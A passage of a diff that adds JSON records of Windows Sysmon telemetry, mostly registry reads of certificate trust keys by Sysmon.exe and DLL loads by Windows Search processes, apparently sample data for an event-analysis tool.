"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msidle.dll", + "image_path": "C:\\Windows\\System32\\msidle.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "SearchFilterHost.exe", + "image_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "tquery.dll", + "image_path": "C:\\Windows\\System32\\tquery.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "mssprxy.dll", + "image_path": "C:\\Windows\\System32\\mssprxy.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "mssprxy.dll", + "image_path": "C:\\Windows\\System32\\mssprxy.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 